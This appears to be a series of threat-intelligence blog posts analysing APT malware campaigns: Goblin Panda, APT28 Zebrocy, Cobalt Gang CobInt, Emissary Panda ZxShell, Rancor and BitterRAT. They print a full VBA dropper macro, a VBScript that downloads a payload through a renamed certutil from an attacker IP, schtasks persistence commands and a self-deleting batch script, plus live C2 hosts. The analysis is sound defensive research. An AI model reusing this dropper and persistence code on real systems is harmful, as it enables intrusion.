Summary

Goblin Panda (also known as Hellsing, Cycledek, and likely other names due to non-standardized naming conventions in security) is a group has been active for the better part of the last decade, and has historically had information theft and espionage related motives that align with Chinese interests. Their targets have primarily been defense, energy, and government organizations located in South/Southeast Asia, with emphasis on Vietnamese targeting. Within this analysis I review artifacts that exhibit behavior consistent with past Newcore RAT samples, which have been attributed to the GoblinPanda APT group.

Analysis

While reviewing suspected dropper files, I came across an interesting document titled “Bao Cao Su Kien Dong Tam.doc”, which translates to “Report the Dong Tam event” in Vietnamese. This document was created on 01-10-2020 at 08:31:00, and purported to contain information about a recent controversy regarding land disputes between the Vietnamese government and the locals of Dong Tam (a rural commune located in Hanoi, Vietnam). While this is not the first time tensions were high between Dong Tam locals and the Vietnamese government, the timing of the most recent events and the document creation date is quite suspect, with the most recent dispute occurring on 01-09-2020 - the day prior to the document creation.

Shown above: Recent news headlines about Dong Tam village (source)

Upon opening the document, CVE-2017-11882 is silently executed in the background. CVE-2017-11882, which was patched by Microsoft in November of 2017, is a memory corruption vulnerability which grants the attacker RCE (remote code execution) upon the user opening a specially crafted file (see here for the Microsoft advisory).

Shown above: Suspected Goblin Panda APT Lure “Bao Cao Su Kien Dong Tam.doc”

Following exploitation, an embedded object “wd32PrvSE.wmf” is dropped to the user’s local temp directory, and subsequently executed. Wd32PrvSE.wmf then drops three files to the user’s local temp directory - QcConsole.exe, QcLite.dll, and stdole.tlb. While QcConsole.exe appears to be a valid and signed file belonging to McAfee, Inc. the other two dropped files (QcLite.dll and stdole.tlb) have less than benevolent intentions.

It should be noted that, at the time of this writing, the document, wd32PrvSE.wmf, QcLite.dll, and stdole.tlb have very low or nonexistent detection rates of only 15/58 (document), 0/56 (WMF), 3/68 (DLL), and 0/56 (TLB) on VirusTotal, respectively.

QcConsole.exe is then executed, and loads QcLite.dll. QcLite.dll will then establish persistence via an autorun registry key named “Windows HD Audio Manager”, drop a file titled “desktop.ini” to the C:\ProgramData\ directory containing obfuscated data, and load the contents of stdole.tlb to memory, and decrypt it, resulting in executable data.

Dllhst3g.exe, a legitimate Windows binary, is then started in a suspended state, injected with the executable data extracted from stdole.tlb, and is subsequently resumed. The compromised dllhst3g.exe then decodes the contents of the previously dropped “desktop.ini” file, which directs it to the location of QcConsol.exe, and QcConsol.exe is executed for a second time.

Shown above: Execution graph

Command & Control communications are then initiated via the secondary QcConsol.exe process to the URLs “hxxp://club[.]baclieuvn[.]com:8080/link?url=maOVmKGmMDU1&enpl=OXco&encd=XARIZTE=” and “hxxp://club[.]baclieuvn[.]com/link?url=maOVmKGmMDU1&enpl=OXco&encd=XARIZTE=”. While this domain currently resolves to the Singapore IP Address 103.253.25[.]15, none of the C2 requests received a response. This may be due to the infrastructure being burnt or specific geolocation requirements.

Shown above: Packet capture of suspected Newcore RAT C2

Although I was unable to obtain additional C2 communications, the activity observed in relation to the dropped artifacts is very reminiscent of Newcore Remote Access Trojan. Furthermore, the targeted nature of the weaponized document, in addition to the apparent targeting of Vietnamese individuals, is quite suspect. While this isn’t conclusive evidence that Goblin Panda is responsible for this sample, the similarities between it and other confirmed Newcore RAT samples, in addition to the fact that Vietnam has historically been targeted by Goblin Panda, is telling.

Indicators

References/Further Reading

1. https://www.fortinet.com/blog/threat-research/cta-security-playbook–goblin-panda.html
2. https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6
3. https://app.any.run/tasks/b64134d1-b809-4ff8-bcb0-91c18425c541/
4. https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf
5. https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/
6. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/
7. https://www.bbc.com/news/world-asia-51105808

Summary

APT28 (also commonly known as FancyBear, STRONTIUM, Sednit, Sofacy, and more) is a threat group that has been attributed to Russia’s Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. The group has been regarded as being active since at least 2004, and is espionage motivated. It’s targets have included the private sector, military, and governments across the world. In this post, I will review a campaign that I believe to have been conducted by APT28.

Analysis

While performing research, I came across an interesting document titled “gorodpavlodar.doc”. This document was an attachment within an equally as interesting email - this email was sent to multiple individuals who, as far as my research indicates, work for a large mining corporation with operations located in Kazakhstan. The email purports to be sent from the “OFFICIAL RESOURCE OF THE CITY OF PAVLODAR”, but is actually sent by the address “pavlodar.news@bk.ru”. Pavlodar is a city in northeastern Kazakhstan and the capital of the Pavlodar Region. The original email and translation are listed below, which prompts the recipient of the email to review the attached document.

ORIGINAL (RUSSIAN):

From: ОФИЦИАЛЬНЫЙ РЕСУРС ГОРОДА ПАВЛОДАР [pavlodar.news@bk.ru]
Subject: ГРАФИК ПОДКЛЮЧЕНИЯ ВАШЕГО ЖИЛОГО ДОМА К ГОРЯЧЕМУ ВОДОСНАБЖЕНИЮ

На сегодняшний день без горячего водоснабжения остаются 240 многоэтажных жилых домов,

передаёт корреспондент pavlodarnews.kz.

С 13 по 19 мая ТОО «Павлодарские тепловые сети» проводило гидравлические испытания на

инженерных сетях теплоснабжения в северной части города. Было выявлено 84 повреждения, в

связи с чем на сегодняшний день без ГВС остаются 240 многоэтажных жилых домов.

С графиком подключения жилых домов к горячему водоснабжению вы можете ознакомится во

вложении, прикрепленному к письму.

________________________________

ОФИЦИАЛЬНЫЙ ИНТЕРНЕТ-РЕСУРС АКИМАТА ГОРОДА ПАВЛОДАР

TRANSLATION:

From: OFFICIAL RESOURCE OF PAVLODAR CITY [pavlodar.news@bk.ru]
Subject: SCHEDULE OF CONNECTING YOUR RESIDENTIAL HOUSE TO HOT WATER SUPPLY

To date, 240 multi-storey residential buildings remain without hot water,

reports correspondent pavlodarnews.kz.

From May 13 to 19, Pavlodar Heating Networks LLP conducted hydraulic tests on

heat supply engineering networks in the northern part of the city. 84 injuries were identified, in

In connection with this, 240 multi-storey residential buildings remain without hot water supply.

You can familiarize yourself with the schedule for connecting residential buildings to hot water in

attachment attached to the letter.

________________________________

OFFICIAL INTERNET RESOURCE OF AKIMAT CITY PAVLODAR

The attached document also contained text written in Russian, which translated roughly to “Schedule of connecting your residential house to hot water supply” and purported to be from the “Official Internet Resource of Akimat City Pavlodar”. The document appeared to be a form for the recipients to fill out with their address, date of water elimination, and reason for lack of hot water. It also prompts the recipient to enable Editing/Content to view the “protected” document.

Shown above: Suspected APT28 Lure “gorodpavlodar.doc”

Opening the Visual Basic console via the developer tab in Word reveals a password protected project that would be run if content were enabled. To bypass this password restriction, I opened the document within a Hex editor and searched for the string “DPB=” which contains the VBA password, and changed it to “DPx=”. Opening the project following this causes Word to throw multiple errors regarding the invalid key (DPx), but allows me to bypass the password restriction. This allows me to view the contents of the project, displayed below, which looks to be a UserForm containing quite a lot of data in two of the input boxes, in addition to some labels.

Shown above: Suspected APT28 Lure VBA Project

If I extract the embedded macro, I can see that it essentially does two things - create two files (graphic.doc and libssl.exe) from the code embedded within the VBA project, and drops those files in the “C:\Users\[username]\AppData\Roaming" directory.

Private Sub Document_Open()
On Error Resume Next
Dim ds As String: ds = Environ("APPDATA") & "\graphic.doc"
Dim dd As String: dd = Environ("APPDATA") & tyihkcjfghkvb.dvxdcxxv.Caption & tyihkcjfghkvb.Label1.Caption & tyihkcjfghkvb.Label2.Caption
vbnbnm dd, drgvfdhre(tyihkcjfghkvb.dxvgfchftbxfh.Value)
vbnbnm ds, drgvfdhre(tyihkcjfghkvb.Text.Value)
Set qw = CreateObject("Word.Application")
qw.Visible = True
Set ww = qw.Documents.Open(ds)
Application.Quit SaveChanges:=wdDoNotSaveChanges
End Sub

Private Function drgvfdhre(tyruyt)
  Dim fghfhggjj, asddf
  Set fghfhggjj = CreateObject("Microsoft.XMLDOM")
  Set asddf = fghfhggjj.createElement("tmp")
  asddf.dataType = "bin.base64"
  asddf.Text = tyruyt
  drgvfdhre = asddf.nodeTypedValue
End Function

Private Sub vbnbnm(tgbyh, edcrf)
  Dim qsxx
  Set qsxx = CreateObject("ADODB.Stream")
  qsxx.Type = 1
  qsxx.Open
  qsxx.Write edcrf
  qsxx.SaveToFile tgbyh, 2
End Sub

Shown above: Macro within gorodpavlodar.doc

Following execution of the macro, the original document is deleted and the secondary document “graphic.doc” is opened. This document appears to be a “completed” version of the form contained within the original document, and also contains an embedded macro that executes the aforementioned executable “libssl.exe”.

Shown above: graphic.doc

Following execution of “libssl.exe”, it will modify the registry to maintain persistence (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run). It will then initiate Command & Control communications to two hard-coded URL’s via HTTP POST requests - www.gorodpavlodar.kz/modules/Contact/Includes/1c.php and www.gorodpavlodar.kz/modules/Contact/Includes/2c.php, along with a hard-coded User-Agent string “Mozilla/5.0 (Windows NT 10.0; Win64; x64)”. The information POST’d includes URL encoded host information - such as a unique ID, drive information, hostname, OS, username, bios, date, process listing, and more. In the past, these POST requests would receive binary data in the server responses, but they are now being met with 404 HTTP responses.

Shown above: Suspected Zebrocy Implant C2 network capture

While I will leave the in-depth malware analysis to those more adept, the observed activity related to the binary up to this point is very reminiscent of APT28’s “Zebrocy” implant. Furthermore, static analysis of the binary reveals numerous similarities to other documented Zebrocy samples - particularly the one documented here by Vitali Kremez. While this isn’t conclusive evidence that APT28 is responsible for this sample, the similarities between it and other confirmed Zebrocy implants, in addition to the fact that Kazakhstan has historically been targeted by APT28, is quite suspect. Regardless, it was an interesting sample to review and gives insight into potential economic espionage activities.

Indicators

References/Further Reading

1. https://www.vkremez.com/2019/01/lets-learn-overanalyzing-one-of-latest.html
2. https://attack.mitre.org/groups/G0007/

Summary

Cobalt Gang (also known as Cobalt Group or Cobalt Spider) is a financially motivated threat group that has largely targeted financial institutions. According to MITRE and other security organizations, the group has primarily targeted banks in Eastern Europe, Central Asia, and Southeast Asia. The activity discussed in this analysis relates to the CobInt/COOLPANTS malware, which has been attributed as a tool utilized by Cobalt Gang.

Analysis

While performing research, I came across an interesting document titled “PFD-19-010.doc” being hosted on the URL www.relax-cream.com/wp-content/plugins/Boss/PFD-19-010.doc. This document purported to be from the Visa, and contained material meant to invoke a concern-driven action by the recipient, such as “Payment Fraud Disruption”. The document prompted the recipient to enable Editing/Content to view the “protected” document.

Shown above: Visa themed lure used by Cobalt Gang

By enabling Editing/Content, the password-protected macro is able to run - this will drop the file “error_log.vbe” in the user’s local temp directory and execute the script via WScript.exe. While I wasn’t able to decode the script itself, upon execution it would manipulate Windows Certificates by writing a blob to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\. Using the CertUtil utility I was able to decode this blob to readable text, which presented the below information.

================ Certificate 0 ================
================ Begin Nesting Level 1 ================
Serial Number: 44afb080d6a327ba893039862ef8406b
Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co.
 NotBefore: 9/30/2000 5:12 PM
 NotAfter: 9/30/2021 10:01 AM
Subject: CN=DST Root CA X3, O=Digital Signature Trust Co.
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template:
Cert Hash(sha1): da c9 02 4f 54 d8 f6 df 94 93 5f b1 73 26 38 ca 6a d7 7c 13
----------------  End Nesting Level 1  ----------------
No key provider information
Cannot find the certificate and private key for decryption.

I am unsure of the significance of this certificate at this time, as it is not utilized by any infrastructure I’ve identified up to this point. Following this, the script would download a payload from the URL “www.huanchacosurf.inti.co.uk/vendor/bin/avatar.hlpv”, store it in the user’s local temp directory, rename it as “Colors.exe”, and execute it. Interestingly this binary was compiled on October 13th 2019 at 17:14:27 and purports to be signed by Symantec Corporation, however it fails verification.

Shown above: Certificate information of payload purporting to be signed by Symantec

Following execution of “Colors.exe”, Command & Control would then be initiated to hunvenbinusa.info over TCP/443. After initial C2 is established, the data returned is stored in a text file titled “zvdpoaqrvytayoaygk[1].txt” in the following location: C:\Users[USERNAME]\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\zvdpoaqrvytayoaygk[1].txt. This file, while at first appearing to be a benign HTML file based on various HTML tags, in fact contains commands sent by the Command & Control server.

Shown above: Contents of zvdpoaqrvytayoaygk[1].txt

At this point in my investigation, I was confident that the payload I was analyzing was CobInt/COOLPANTS (or similar variant) malware used by Cobalt Gang. According to an article released by ProofPoint in September 2018, the text file contains encrypted command data - such as commands to load/execute a module, stop polling the C2, execute a function set by a module, or update the C2 polling wait time. To decrypt this data, ProofPoint states that you would need to:

1. Remove HTML tags
2. Convert all text to lowercase
3. Remove all characters that are not “a-z”
4. Convert the characters into binary data via an unknown decoding algorithm
5. XOR decrypt the binary data with the embedded 64-byte XOR key used in C&C host decryption
6. Perform a second round of XOR decryption using the following key:
   • XOR key length is indicated by the last byte of data
   • XOR key is the last “X” bytes of data (excluding length byte), where “X” is the length of the key

They also provided a Python script to automate this process, which can be found here on GitHub.

I was unable to identify any subsequent commands or modules being loaded throughout my analysis of the payload. With that in mind, I decided to try and identify additional infrastructure being utilized by Cobalt Gang for this campaign, which is where I started to go down a rabbit hole…

Shown above: VirusTotal Graph of investigation

Performing a search on PassiveTotal for the first domain I observed (www.huanchacosurf.inti.co.uk) revealed 34 additional subdomains. Initial research into these subdomains made them appear as if they were business pages in various fields such as law, media, outdoors, and psychology - all of which were located in Trujillo Peru. An additional point of interest is that “inti.co.uk” is very similar to the legitimate “init.co.uk” domain, which belongs to the German based company “INIT Group”.

Shown below: Subdomains for INTI.CO.UK

ascoyabogados.inti.co.uk
barriosanjose.inti.co.uk
brallec.inti.co.uk
ceramicoshuanchaco.inti.co.uk
easyclubadmin-net.inti.co.uk
ftp.inti.co.uk
huanchacosurf.inti.co.uk
inti.co.uk
ladrilloschanchan.inti.co.uk
mail.inti.co.uk
me.inti.co.uk
moromeinmobiliaria.inti.co.uk
nirvan.inti.co.uk
nirvana.inti.co.uk
psicoaccion.inti.co.uk
renacerfuneraria.inti.co.uk
sbssanjorge.inti.co.uk
screenmediastudio.inti.co.uk
sermedicsac.inti.co.uk
surfcastingtrujillo.inti.co.uk
www.ascoyabogados.inti.co.uk
www.barriosanjose.inti.co.uk
www.brallec.inti.co.uk
www.ceramicoshuanchaco.inti.co.uk
www.easyclubadmin-net.inti.co.uk
www.huanchacosurf.inti.co.uk
www.ladrilloschanchan.inti.co.uk
www.me.inti.co.uk
www.moromeinmobiliaria.inti.co.uk
www.psicoaccion.inti.co.uk
www.renacerfuneraria.inti.co.uk
www.sbssanjorge.inti.co.uk
www.screenmediastudio.inti.co.uk
www.sermedicsac.inti.co.uk
www.surfcastingtrujillo.inti.co.uk

Reverse DNS searches into the IP address hosting inti.co.uk (173.254.28.36) revealed that there were actually “.com” versions of these domains as well - such as surfcastingtrujillo.com or sermedicsac.com. Reviewing these domains returned some interesting findings - such as some of them having the same favicon, lorem ipsum text, fake reviews, the same addresses, and more. These domains also contained text indicating they were developed by a Peruvian media company “Screen Media Studio”. Research into this media company returns a YouTube channel, a website (screenmediastudio.com), Facebook page, and more, and appeared to be legitimate as a result.

At this point in my investigation, I was starting to think that these domains were unrelated to the infrastructure I was researching. I then performed a final search on PassiveTotal to see what SSL certificates inti.co.uk used and found four “LetsEncrypt” certificates that were recently used by all the aforementioned domains INCLUDING screenmediastudio.com. At this point in time, I have not seen any subdomain besides “www.huanchacosurf.inti.co.uk” serve malicious artifacts for this campaign, and therefore cannot confirm that the other listed domains are related to or being used by this campaign, but I find the aforementioned similarities highly anomalous, including that all of the inti.co.uk subdomains and seemingly “legitimate” domains share the same LetsEncrypt certificates as a domain serving CobInt/COOLPANTS malware.

Shown above: LetsEncrypt Certificates used by inti.co.uk recently

I then performed a search on PassiveTotal for the initial C2 domain (hunvenbinusa.info) and found that it shared an IP address with two other domains - bueatyslim.site and ispot-world.com. While I haven’t found evidence indicating ispot-world.com is related to this campaign, Censys.io records reveal that bueatyslim.site utilizes a LetsEncrypt certificate that contains a SANs (Subject Alternative Name) of “hunvenbinusa.info” - therefore, I believe bueatyslim.site to be an additional C2 domain utilized in this campaign.

At this time, I was unable to obtain evidence of target attribution - however they have primarily targeted financial institutions in Eastern Europe, Central Asia, and Southeast Asia per MITRE’s research. It is also interesting to see how investigating small “threads” of evidence can lead to going down many rabbit holes - possibly unraveling the “ball of yarn” that is an attacker’s infrastructure.

Indicators

References/Further Reading

1. https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint
2. https://github.com/EmergingThreats/threatresearch/blob/master/cobint/stage2_decrypt_response.py
3. https://threatpost.com/cobalt-group-targets-banks-in-eastern-europe-with-double-threat-tactic/137075/
4. https://attack.mitre.org/groups/G0080/
5. https://app.any.run/tasks/f6e0598d-a1e4-4503-953c-6d7506e2ef66/

Summary

Emissary Panda, a group that goes by many names (APT27, IronTiger, BronzeUnion, TG-3390, and LuckyMouse), is a Chinese APT that is suspected of being active for nearly a decade. This group has been known to target aerospace, government, defense, technology, energy, and manufacturing sectors. Not much activity has been publicly recorded on this group as of late, but research indicates they are not dormant.

Analysis

While performing research, I identified a suspect binary titled “odbcad32.exe”. What immediately piqued my interest was that this binary, while having the appearance of the legitimate “Open Database Connectivity Data Source Administrator utility” by Microsoft, was not signed with a Microsoft certificate. Instead, this binary was signed with a certificate belonging to “Hangzhou Bianfeng Networking Technology Co., Ltd.”. Open source research on this company name indicates that it is a Chinese software company, and a subsidiary of the media organization “Zhejiang Daily Digital”, which is headquartered in Hangzhou, China.

Shown above: Certificate used to sign malicious binary used by Emissary Panda APT

At this point, I decided to dig deeper into this binary and see why it was attempting to disguise itself as a legitimate Microsoft utility. Upon execution, the binary would elevate privileges and drop two files - odbccx32.dll in the C:\Windows\system32\ folder, and a randomly named batch file in the user’s local temp folder.

@echo off
:err
del "c:\Users\[Username]\Desktop\odbcad32.exe" >nul
if exist "c:\Users\[Username]\Desktop\odbcad32.exe" goto err
>nul
@echo on
del "c:\Users\[Username]\AppData\Local\Temp\[random].bat"

Shown above: Content within the batch file

Net.exe was then launched with the parameters “stop “Remote Registry Configuration””. Next, rundll32.exe loads the aforementioned “odbccx32.dll”, and then another net.exe is launched with the parameters “start “Remote Registry Configuration””. Once the malicious DLL is loaded via rundll32.exe, it then establishes persistence via a new service. Cmd.exe then executes the dropped batch file, which deletes the originally executed file, as well as the batch file itself.

Following this, Svchost.exe is executed and loads the malicious odbccx32.dll. It then drops the file “autochk.sys” in the C:\Windows\system32\drivers\ folder, and reads the hosts file located in the C:\Windows\system32\drivers\etc\hosts folder (this file contains the mappings of IP addresses to host names). Command & Control is then initiated to “yofeopxuuehixwmj.redhatupdater.com” over ports 53, 80, and 443. While this domain currently resolves to 80.85.153.176, no response was received from probing attempts, and no secondary payload was observed.

Shown above: Process graph

The TTP’s (Tactics, Techniques, and Procedures) observed in this sample are consistent with those seen in past attacks conducted by the Emissary Panda APT group, specifically in relation to the ZxShell Remote Access Trojan (RAT) which they have been observed using.

I then pivoted into VirusTotal’s relational graphing utility to see if I could gather additional information on this campaign’s infrastructure. This revealed four structurally similar binaries that I suspect of also being ZxShell RAT installers - one of which beaconed to the same Command & Control server as the original sample (yofeopxuuehixwmj.redhatupdater.com). The second and third binaries beaconed to language.wikaba.com and solution.instanthq.com - both of which have been documented as being Command & Control servers for past Emissary Panda APT campaigns. I was unable to confirm the fourth binary being a ZxShell RAT installer, which beacons to awvsf7esh.dellrescue.com, however VirusTotal deems that it is structurally similar to previously confirmed installers. Please note that the domain “dellrescue.com” has been documented by Cylance as having been used in a campaign conducted by PassCV APT group in 2016, although the subdomain utilized was different (sc.dellrescue.com).

Shown above: VirusTotal Graph

At this time, I was unable to obtain evidence of target attribution - however in the past Emissary Panda APT has been observed targeting Asia, Middle East, US, and UK based organizations and infrastructure. What struck me as most interesting from my analysis of this sample was how the Emissary Panda APT group was able to obtain a valid certificate to sign their Remote Access Trojan binary, which sparks the question - was this group able to compromise the Chinese based software company and steal their certificate(s), or are there possible insider threats lurking within? Regardless, it is an interesting sample and displays that Emissary Panda is still active.

Indicators

References/Further Reading

1. https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox
2. https://securelist.com/luckymouse-hits-national-data-center/86083/
3. https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
4. https://thehackernews.com/2018/06/chinese-watering-hole-attack.html
5. https://arstechnica.com/information-technology/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
6. https://attack.mitre.org/groups/G0027/
7. https://threatvector.cylance.com/en_us/home/digitally-signed-malware-targeting-gaming-companies.html
8. https://app.any.run/tasks/91aee60c-6982-461a-a006-e601c8879fb0/

Summary

Rancor - a Chinese APT identified by PaloAlto in 2017 has recently been observed targeting South East Asia using RTF’s containing CVE-2018-0798. They are believed to have goals of espionage. In this post I review a recently created RTF document used to lure and target South East Asian entities.

Analysis

While conducting research I came across an RTF document on VirusTotal, which was created on 2019-08-28 at 00:35:00 and uploaded on 2019-09-11 at 08:48:41. Initial review of this RTF revealed highly suspect activity consistent with APT lures that I have observed in the past.

Upon opening the RTF document you are presented with a list of names written in Khmer, the official language of Cambodia, and spoken throughout South East Asia. The content of the document, when translated, attempts to appear as if it was sent by the Cabinet of Cambodia and lists out names of various government officials.

Shown above: Rancor RTF Lure

Whilst reviewing this “official” looking document, CVE-2018-0798 is being executed in the background. CVE-2018-0798 is an RCE vulnerability which allows a stack buffer overflow that can be exploited by a threat actor to perform stack corruption. In July 2019, Anomali wrote a detailed article on this exploit and how they observed multiple Chinese threat groups utilizing it to compromise their targets (including Rancor). This allows the attackers to create the file “OSEA54d.tmp” in the “C:\Users[username]\AppData\Local\Temp" folder and execute it.

OSEA54d.tmp then drops GoogleUpdate.exe (7b973145f7e1b59330ca4dd1f86b3d55) within “C:\Windows\System32\spool\drivers\color\“. Analysis of the GoogleUpdate.exe binary reveals it is merely CertUtil.exe, a legitimate Microsoft command-line utility that can be used to obtain certificate authority information and configure Certificate Services. It can also be used for nefarious purposes, such as downloading files from a given URL. Next, OSEA54d.tmp creates a .vbs script in the same folder, titled “Photo.vbs”.

Shown below: Photo.vbs script

wscript.sleep 3000:wscript.createobject("wscript.shell").run "%windir%\system32\spool\drivers\color\GoogleUpdate.exe -f -u""rlca""che ""h""tt""p"":/""/167.71.237.100/%ComputerName%.png"" %temp%\%ComputerName%.tmp",0,0

Stepping through this script, we can break it down to two parts - first it calls “wscript.sleep” which causes it to suspend the execution of the script for a specified number of milliseconds (in this case, 3000). Second, we see it call “wscript.createobject(“wscript.shell”).run”, which allows you to run a cmdline command from a .vbs script. This runs GoogleUpdate.exe, which we previously identified as CertUtil.exe, with the -f and -urlcache flags to force fetch a specified URL and update the cache. The URL provided (167.71.237.100/%ComputerName%.png) requests a file based off the user’s computer name (i.e. USER-PC), which is then stored in the user’s local temp folder as a .tmp file.

Next, I observed OSE91E4.tmp launch two child cmd.exe processes with the following parameters:

Shown below: “Google-Updates” scheduled task

cmd /c schtasks /create /sc MINUTE /tn "Google-Updates" /tr "msiexec /q /i %temp%\%ComputerName%.tmp" /mo 3 /F

The first cmd.exe calls schtasks to create a scheduled task called “Google-Updates”, which utilizes “msiexec” to execute the downloaded payload “[ComputerName].tmp” from the user’s local temp folder once every minute. This would be used to maintain persistence once the secondary payload was downloaded.

Shown below: “Google-Update” scheduled task

cmd /c schtasks /create /sc MINUTE /tn "Google-Update" /tr "wscript /b %windir%\system32\spool\drivers\color\Photo.vbs" /mo 2 /F

The second cmd.exe calls schtasks to create a scheduled task called “Google-Update” (note the missing “s” in comparison to the prior scheduled task. Due to the /F flag, even if they had identical names, it would forcefully create the task and suppresses warnings if the specified task already existed). This utilizes wscript to run “Photo.vbs” from the user’s local temp folder once every minute.

Shown above: Process graph

Unfortunately, whenever a secondary payload was requested from the URL “167.71.237.100/[ComputerName].png” containing my computer’s name (USER-PC), regardless of geolocation, it returned 404 Not Found HTTP responses. That indicates several possibilities to me - such as the attackers already knowing the computer name of their target and only returning a payload if it is matched, specific geolocation requirements, or the file was removed from the server.

Shown above: Packet capture of Rancor RTF 2nd stage payload request

Due to the final payload not being available for analysis, I was unable to compare prior samples of malware used by Rancor to confirm attribution - however, based on the TTP’s (Tactics, Techniques, Procedures) observed, I can say with a high degree of confidence that this activity is related to Rancor APT. Therefore, the final payload would have likely been DDKONG or PLAINTEE malware which serve as backdoors, allowing the actors to list files, upload/download files, and execute other commands.

Translated RTF Lure

Office of the Council of Ministers
From Head of Department to Director General
A. General Department of Administration and Finance
1. HE Chhum Thong, Director General
2. HE Binny Tiara, Deputy Director General
3. Mr. Kim Sung, Deputy Director General
4. Mr. Yim Roulli, Director of Administration Department
5. Sorn Seth, Head of Supply and Finance Department
6. Mr. Sam Bunna, Head of Personnel Department
7. Mrs. Hak Porleang, Head of Protocol Department
B. General Department of General Affairs
1. Mr. Oum Sambath, Acting Director General
2. Deputy Prime Minister Yim Sokunthy
3. Mr. Heng studied Deputy Director
4. The Deputy Director General
5. Mr. Phuang Construction Deputy Director General
6. Soth Thy, Head of Electronic and Information Technology Department
7. Mr. Van Mony Sovann, Head of Total Department
8. Mr. So Seyha, Head of Department of Excellence
9. Mr. Kheang Seng, Acting Head of Department, Department of Cabinet Plenary and other meetings
10. Miss. Kim Marian, Acting Director, Research and Documentation Support Meeting

C. General Department of International Cooperation
1. Her Excellency Hean Polynes, General Director in addition to the Vice President
Cambodian Human Rights Committee
2. Keo Kannarith, Deputy Director General
3. Mr. Tuy Sina, Deputy Director General
4. Hem Oum Sithiel, Head of International Relations Department
5. Pa. Panna Radar, Acting Director of the ASEAN Department
D. Directorate General for Internal Affairs
1. Mr. Sao Phalla, Director General
2. HE Sarun Rady, Deputy Director General
3. Mr. Ung Chanthou, Deputy Director General
4. Ms. Pich Channary, Deputy Director General
5. Mr
6. Rith Arunithya, Director of the Department of the Interior, Defense, Justice and the Constitutional Institution
7. Mr. Heng Sok is Director of Department of Public Works and Relations with the National Assembly, Senate and Inspection
8. Meas Men, Head of Department of Information, Posts and Telecommunications
E. Department of Economy and Tourism
1. Youk Chhang, Director General
2. Seng Vannath, Deputy Director General
3. Mrs. Svay Nary, Deputy Director General
4. HE Phat Salin, Deputy Director General
5. Mr.Ratt Sok is the Head of Finance and Banking Department
6. Mr. Iv Reth heads the Department of Industry, Mineral and Energy
7. Ty, Director of the Department of Commerce and Tourism
8. Lim Kithya, Director of Planning and Development Department
F. General Department of Social Affairs
1. Mr. Thong Sokun, Director General
2. Von Sothun, Deputy Director General
3. Mr. Seng Sin, Deputy Director General
4. Mr. Sok Daravuth, Deputy Director General
5. Heidi Dinar, Head of Department of Education, Culture, Cult and Religion
6. Mr. Chea Phally, Director of Department of Health, Social Affairs and Women's Affairs
G General Department of Production, Land Management, Urban Planning and Construction
1. HE Long Sokha, Director General
2. His Excellency Bin Bunhat, Deputy Director General
3. Chay Seng Thong, Deputy Director General
4. Mr. Ly Sothy Roth, Deputy Director General
5. Phoung Phalkun, Director of Department of Agriculture and Water Resources
6. Hak Seila, Director of Department of Rural Development, Public Works and Transport
7. Ms.
Neth Chhunny, acting director of the Department of Land Management, Urban Planning, Construction and Environment
J General Department of Civil Affairs and National Archives
1. HE Ngin Phalroth, Director General
2. Mr. Four Hing Sothy, Deputy Director General
3. Seng Manrith, Deputy Director General
4. Mr. Suos Visoth, Deputy Director General
5. Ms. Sovann Sovanna, Head of Department of Government
6. Mrs. Dary, Head of the National Archives Department
I. Department of Internal Audit
Mak Thearith, Head of Internal Audit Department

Shown above: Translation of the content within the RTF.

Indicators

References/Further Reading

1. https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/
2. https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018
3. https://attack.mitre.org/groups/G0075/
4. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798

Summary

In my last post I reviewed a recent BITTER campaign which used the ArtraDownloader and was observed targeting Pakistani organizations. This post is a continuation of my tracking efforts of the APT group known as “BITTER”, in which I review additional undiscovered infrastructure and their Remote Access Trojan (RAT) known as BitterRAT.

Analysis

While conducting research, I came across a binary (d8b2cd8ebb8272fcc8ddac8da7e48e01) on VirusTotal that was uploaded on 2019-07-27. According to an automated comment by THOR APT Scanner, this binary triggered detections for the rule “APT_RAT_Patchwork_Jan19_2”. Reviewing the Command & Control communications for this binary confirmed it to be BitterRAT, a RAT used by the BITTER APT group as well as others (such as Patchwork, Hangover, etc.) in the past. The Command & Control for this binary was sent to blth32serv.net (82.221.129.19). During my analysis, one thing that stood out as particularly interesting was that this binary utilized a certificate that appears to belong to the Sindh Police, which is headquartered in Karachi, Pakistan. The certificate is now expired (it was only valid from 7/25/2019 to 8/25/2019) and is giving warnings that the certificate cannot be verified. A recent Tweet by the RedDrip team reaffirm these findings, in which they state that BITTER had stolen the aforementioned certificate.

Shown above: Certificate of BitterRAT binary

Armed with the information that blth32serv.net is the primary C2 for this BitterRAT sample, I then pivoted into VirusTotal’s relational graphing to see if I could gather additional information on this campaign’s infrastructure. This revealed another binary, nsdtcv.exe (596ec0f90c25fdbe3d8ade3f4ea4cd38), that beacons to blth32serv.net as it’s primary Command & Control. This second binary is currently being served via the URL w32infinitisupports.net/win/ctf (94.156.175.61) - at the time of this writing, I cannot find anything indicating this domain is known or being tracked in relation to BITTER APT.

Shown above: VirusTotal Graph of this campaign’s infrastructure

Analysis of this secondary binary produced results that I would expect to see from BitterRAT - such as persistence via an autorun registry key, C2 via GET requests containing the URI pattern “.php?TIe=[encoded data]”, etc.

Shown above: Packet capture of BitterRAT C2

